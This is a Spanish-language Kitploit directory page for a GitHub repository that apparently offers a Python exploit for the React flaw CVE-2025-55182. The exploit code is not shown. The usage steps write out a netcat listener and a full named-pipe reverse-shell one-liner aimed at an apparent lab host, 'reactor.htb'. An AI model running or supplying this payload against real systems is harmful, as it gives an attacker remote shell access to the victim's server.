Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/akhmadkholmurodov/react2shell_exploit
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubakhmadkholmurodov/react2shell_exploit

React2Shell_Exploit

Creé un simple exploit de react2shell CVE-2025-55182 en python

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
hace 2 mesesAún no revisado

React2Shell_Exploit CVE-2025-55182

He creado un exploit simple en Python para react2shell CVE-2025-55182

USO

  1. Guarda el script: Guarda el código anterior como exploit.py.

  2. Actualiza los hosts: Asegúrate de que reactor.htb se resuelva a la IP objetivo en tu archivo /etc/hosts. echo "<TARGET_IP> reactor.htb" | sudo tee -a /etc/hosts

  3. Inicia el listener: Abre una terminal para capturar la reverse shell. nc -lvnp 4444

  4. Ejecuta el exploit: Ejecuta el script con un payload de reverse shell. python3 exploit.py http://reactor.htb:3000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <YOUR_IP> 4444 >/tmp/f"

  5. Reemplaza <YOUR_IP> con la dirección IP de tu tun0.

Descargar herramienta